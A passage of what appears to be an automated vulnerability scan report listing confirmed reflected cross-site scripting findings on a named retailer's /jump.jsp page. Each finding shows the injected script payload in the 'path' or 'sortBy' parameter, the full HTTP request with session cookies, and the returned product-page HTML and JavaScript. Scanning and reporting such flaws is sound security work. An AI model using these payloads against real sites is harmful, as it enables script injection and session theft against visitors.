bIsPerzValid = validatePersonalization(strSuffix);
//alert (bIsPerzValid);
}
} //if (qtyval > 0)
} //end if (elementName.indexOf("qty") == 0)
//Added for Customization
if (elementName == "CustOptions") {
blnCustomOptions = true;
//alert("Custom - True");
} //else { alert("Custom - False"); }
} //end for (i=0;i<document.ProductDetail.elements.length;i++)
if (blnCustomOptions) {
if (document.ProductDetail.CustomOptionId.value == 0) {
alert("Select valid Custom Option.");
blnIsValid = false;
}
}//end if (blnCustomOptions)
//End Customization

var ns4 = (document.layers)? true:false
//alert("is checkout? " + bIsCheckout);
//alert("checkout msg: " + sCheckoutMsg);
//alert("Is NetScape: " + ns4);
if(bIsCheckout){
if(sCheckoutMsg!=""){
if(!confirmCheckout(sCheckoutMsg)){
blnValidQty = true;
blnIsValid = true;
document.ProductDetail.ATBCCO.value = "1";
}
} else {
blnValidQty = true;
blnIsValid = true;
}
}
if (!blnIsValid) {
alert("Select valid option(s).");
}else if (!blnValidQty) {
if(bIsCheckout){
blnIsValid = true;
}else{
if (qtyval > 0) {
alert("Please limit your order to quantities of 5 or less. For larger orders please contact customer service. ");
}
else {
alert("A quantity has not been entered. ");
}
blnIsValid = false;
}
} else if(!bIsPerzValid) {
alert(perzErrMsg);
blnIsValid = false;
}
return blnIsValid;
//return false;

}

function setATBOCO(inValue) {
document.ProductDetail.ATBOCO.value=inValue;
//alert("Just Set ATBOCO Value As: " + document.ProductDetail.ATBOCO.value);
return true;
}
function checkoutForNS_onclick() {
document.ProductDetail.ATBOCO.value="1";
alert("Just Set ATBOCO Value As: " + document.ProductDetail.ATBOCO.value);
if(formValidate){
document.ProductDetail.submit();
}
}
function confirmCheckout(sItemsIn) {
var sCheckoutMsg = "Do you wish to add the following items to\r\nyour shopping basket before you check out?\r\n" + sItemsIn;
if (confirm(sCheckoutMsg)) {
return true;
}else {
return false;
}
}
function selectCustomOption(frm){
//alert (frm.CustomOptionId.value);
var iCustomOptionId = frm.CustOptions.options[frm.CustOptions.selectedIndex].value;
frm.CustomOptionId.value = iCustomOptionId ;
//alert(frm.CustomOptionId.value);
}

function formValidateCustomize(frm){
var bValid = true;
//alert(document.ProductCustomize.prompt1.value);
if (document.ProductCustomize.prompt1.value == "") {
bValid = false;
alert ("Please enter customization information in the fields provided.");
}
return bValid
}

function gotoNewWindowRememberSettings(oSelect, sProductID) {
var ns4 = (document.layers)? true:false
var ie4 = (document.all)? true:false
if (oSelect.options[oSelect.selectedIndex].value == -1) {
document.ProductDetail.ANSA.value=sProductID;
document.ProductDetail.submit();
}else{
document.ProductDetail.ANSA.value="0";
}
}

function validatePersonalization(rowNo) {
perzErrMsg = "";
var shfCode = getHiddenVariableForDetailPage("row_"+rowNo+"_perzShfCode");
var menu = document.getElementById("perzid_"+ rowNo+"_0");

if(menu) {
var selectedVal = menu[menu.selectedIndex].value;
//alert (' selectedVal :' + selectedVal);

// Monogramming validation
if(shfCode == 'M') {

var textField = document.getElementById("perzid_"+ rowNo+"_1");
// if menu is not selected but there is a value in text field message the user
if( (selectedVal == "0" || selectedVal == "None") && (textField.value !='') ){
perzErrMsg = "Please select Style.";
return false;
}else if( (selectedVal !="0" && selectedVal != "None") && textField.value=='' ){
perzErrMsg = "Please enter Initials.";
return false;
}
} else {
// pant hemming
var menu2 = document.getElementById("perzid_"+ rowNo+"_1");
var selectedVal2 = menu2[menu2.selectedIndex].value;
//alert (' selectedVal2 :' + selectedVal2);
// if there is value selected for the 1st drop down then only request for 2nd value.
if(selectedVal !="0" && selectedVal != "None"){
if(selectedVal2 == "0") {
perzErrMsg = "Please select Lengt..

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp?itemID=3443&itemType=PRODUCT&path='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter	Type	Value
itemID	GET	3443
itemType	GET	PRODUCT
path	GET	'"--></style></script><script>alert(0x00008F)</script>
iProductID	GET	3443
sortBy	GET	alpha
page	GET	1
onePage	GET	1

Request

GET /jump.jsp?itemID=3443&itemType=PRODUCT&path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00008F)%3C/script%3E&iProductID=3443&sortBy=alpha&page=1&onePage=1 HTTP/1.1
Referer: https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62381532; customer=92645377; mmlID=68409741; JSESSIONID=asM_YQOowXta; RecentViewedItems=9833/8773/3443/9687
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:27:36 GMT
Server: Apache
ETag: "AAAAS53/+R/"
Last-Modified: Wed, 02 Mar 2011 19:16:22 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: RecentViewedItems=9833/8773/9687/3443; Path=/; Expires=Wed, 16-Mar-2011 19:16:21 GMT
Connection: close
Content-Type: text/html;charset=UTF-8



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>Made In The Fade Twill Long Sleeve Shirt - The Territory Ahead</title>

<link href="http://www.territoryahead.com/jump.jsp?itemID=3443&itemType=PRODUCT" rel="canonical" />

<meta name="description" content="Lightweight pigment garment-dyed cotton twill that's tumble-washed to stir up rustic texture. With abalone-style buttons, and our usual relaxed fit. Top buttonhole, penslot and cuff seams are finished with contrast-colored stitching. 100% cotton. Machine washable. Imported in Pool; White; Washed Red, Plum, Smokey Blue. Regular Sizes: S(34-36), M(38-40), L(42-44), XL(46-48), XXL(50-52) Tall Sizes: LT(42-44), XLT(46-48), XXLT(50-52)">

<meta name="keywords" content="Mens, shirts, Made In The Fade Twill Long Sleeve Shirt, 143750">

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

<script type="text/javascript">
<!--

var perzErrMsg = "";
function formValidate() {
var blnIsValid = true;
var blnValidQty = false;
var bIsCheckout = false;
var sCheckoutMsg = "";
var bIsPerzValid = true;

//alert("ATBOCO Value: " + document.ProductDetail.ATBOCO.value);
if(document.ProductDetail.ATBOCO.value == "1"){
bIsCheckout = true;
}
//alert("ATBOCO: " + document.ProductDetail.ATBOCO.value + ", Is Checkout: " + bIsCheckout);
var blnCustomOptions = false; //added for customization
for (i=0;i<document.ProductDetail.elements.length;i++){
var strSuffix = "";
var elementName = document.ProductDetail.elements[i].name;
//alert("Name: " + elementName + ", Type: " + document.ProductDetail.elements[i].type + ", Value: " + document.ProductDetail[elementName].value);
if (elementName.indexOf("qty") == 0) {
// if the quantity is greater than zero then check the
// options to make sure they've been set.
var qtyval=0;

qtyval = document.ProductDetail[elementName].value;

// GRG Added check for qty to be larger than 5 per cbrt request #03048.
if ((qtyval > 0) && (qtyval < 6)) {
blnValidQty = true;
if (elementName.length > 3) {
// multi-product
strSuffix = elementName.substring(3);
}
// Build CheckOut Message
sCheckoutMsg += "\r\n" + qtyval + " " + eval("document.ProductDetail." + "pName" + strSuffix + ".value");
// Search for options...
var strOptName = "options" + strSuffix;
for (j=0;j<document.ProductDetail.elements.length;j++) {
if (document.ProductDetail.elements[j].name == strOptName) {

if (document.ProductDetail.elements[j].type == "select-one") {
var intSelected = document.ProductDetail.elements[j].selectedIndex;
if(document.ProductDetail.elements[j].options[intSelected].value == 0) {
blnIsValid = false;
}
}// end select handler
}// end name check
}// end for(j)
if(blnIsValid && blnValidQty && bIsPerzValid) {
bIsPerzValid = validatePersonalization(strSuffix);
//alert (bIsPerzValid);
}
} //if (qtyval > 0)
} //end if (elementName.indexOf("qty") == 0)
//Added for Customization
if (elementName == "CustOptions") {
blnCustomOptions = true;
//alert("Custom - True");
} //else { alert("Custom - False"); }
} //end for (i=0;i<document.ProductDetail.elements.length;i++)
if (blnCustomOptions) {
if (document.ProductDetail.CustomOptionId.value == 0) {
alert("Select valid Custom Option.");
blnIsValid = false;
}
}//end if (blnCustomOptions)
//End Customization

var ns4 = (document.layers)? true:false
//alert("is checkout? " + bIsCheckout);
//alert("checkout msg: " + sCheckoutMsg);
//alert("Is NetScape: " + ns4);
if(bIsCheckout){
if(sCheckoutMsg!=""){
if(!confirmCheckout(sCheckoutMsg)){
blnValidQty = true;
blnIsValid = true;
document.ProductDetail.ATBCCO.value = "1";
}
} else {
blnValidQty = true;
blnIsValid = true;
}
}
if (!blnIsValid) {
alert("Select valid option(s).");
}else if (!blnValidQty) {
if(bIsCheckout){
blnIsValid = true;
}else{
if (qtyval > 0) {
alert("Please limit your order to quantities of 5 or less. For larger orders please contact customer service. ");
}
else {
alert("A quantity has not been entered. ");
}
blnIsValid = false;
}
} else if(!bIsPerzValid) {
alert(perzErrMsg);
blnIsValid = false;
}
return blnIsValid;
//return false;

}

function setATBOCO(inValue) {
document.ProductDetail.ATBOCO.value=inValue;
//alert("Just Set ATBOCO Value As: " + document.ProductDetail.ATBOCO.value);
return true;
}
function checkoutForNS_onclick() {
document.ProductDetail.ATBOCO.value="1";
alert("Just Set ATBOCO Value As: " + document.ProductDetail.ATBOCO.value);
if(formValidate){
document.ProductDetail.submit();
}
}
function confirmCheckout(sItemsIn) {
var sCheckoutMsg = "Do you wish to add the following items to\r\nyour shopping basket before you check out?\r\n" + sItemsIn;
if (confirm(sCheckoutMsg)) {
return true;
}else {
return false;
}
}
function selectCustomOption(frm){
//alert (frm.CustomOptionId.value);
var iCustomOptionId = frm.CustOptions.options[frm.CustOptions.selectedIndex].value;
frm.CustomOptionId.value = iCustomOptionId ;
//alert(frm.CustomOptionId.value);
}

function formValidateCustomize(frm){
var bValid = true;
//alert(document.ProductCustomize.prompt1.value);
if (document.ProductCustomize.prompt1.value == "") {
bValid = false;
alert ("Please enter customization information in the fields provided.");
}
return bValid
}

function gotoNewWindowRememberSettings(oSelect, sProductID) {
var ns4 = (document.layers)? true:false
var ie4 = (document.all)? true:false
if (oSelect.options[oSelect.selectedIndex].value == -1) {
document.ProductDetail.ANSA.value=sProductID;
document.ProductDetail.submit();
}else{
document.ProductDetail.ANSA.value="0";
}
}

function validatePersonalization(rowNo) {
perzErrMsg = "";
var shfCode = getHiddenVariableForDetailPage("row_"+rowNo+"_perzShfCode");
var menu = document.getElementById("perzid_"+ rowNo+"_0");

if(menu) {
var selectedVal = menu[menu.selectedIndex].value;
//alert (' selectedVal :' + selectedVal);

// Monogramming validation
if(shfCode == 'M') {

var textField = document.getElementById("perzid_"+ rowNo+"_1");
// if menu is not selected but there is a value in text field message the user
if( (selectedVal == "0" || selectedVal == "None") && (textField.value !='') ){
perzErrMsg = "Please select Style.";
return false;
}else if( (selectedVal !="0" && selectedVal != "None") && textField.value=='' ){
perzErrMsg = "Please enter Initials.";
ret..

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp?itemID=9687&itemType=PRODUCT&path=1%2C2%2C4%2C341&iProductID..

Parameters

Parameter	Type	Value
itemID	GET	9687
itemType	GET	PRODUCT
path	GET	1,2,4,341
iProductID	GET	9687
sortBy	GET	'"--></style></script><script>alert(0x0000AF)</script>

Request

GET /jump.jsp?itemID=9687&itemType=PRODUCT&path=1%2C2%2C4%2C341&iProductID=9687&sortBy='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000AF)%3C/script%3E HTTP/1.1
Referer: https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62381532; customer=92645377; mmlID=68409741; JSESSIONID=bY2TfXuSpmEe; RecentViewedItems=3443/9687
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:19:57 GMT
Server: Apache
ETag: "AAAAS54AW5F"
Last-Modified: Wed, 02 Mar 2011 19:18:03 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: RecentViewedItems=3443/9687; Path=/; Expires=Wed, 16-Mar-2011 19:18:02 GMT
Connection: close
Content-Type: text/html;charset=UTF-8



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>All Seasons Vest - The Territory Ahead</title>

<link href="http://www.territoryahead.com/jump.jsp?itemID=9687&itemType=PRODUCT" rel="canonical" />

<meta name="description" content="The Territory Ahead - All Seasons Vest - All Seasons Vest">

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

<script type="text/javascript">
<!--

var perzErrMsg = "";
function formValidate() {
var blnIsValid = true;
var blnValidQty = false;
var bIsCheckout = false;
var sCheckoutMsg = "";
var bIsPerzValid = true;

//alert("ATBOCO Value: " + document.ProductDetail.ATBOCO.value);
if(document.ProductDetail.ATBOCO.value == "1"){
bIsCheckout = true;
}
//alert("ATBOCO: " + document.ProductDetail.ATBOCO.value + ", Is Checkout: " + bIsCheckout);
var blnCustomOptions = false; //added for customization
for (i=0;i<document.ProductDetail.elements.length;i++){
var strSuffix = "";
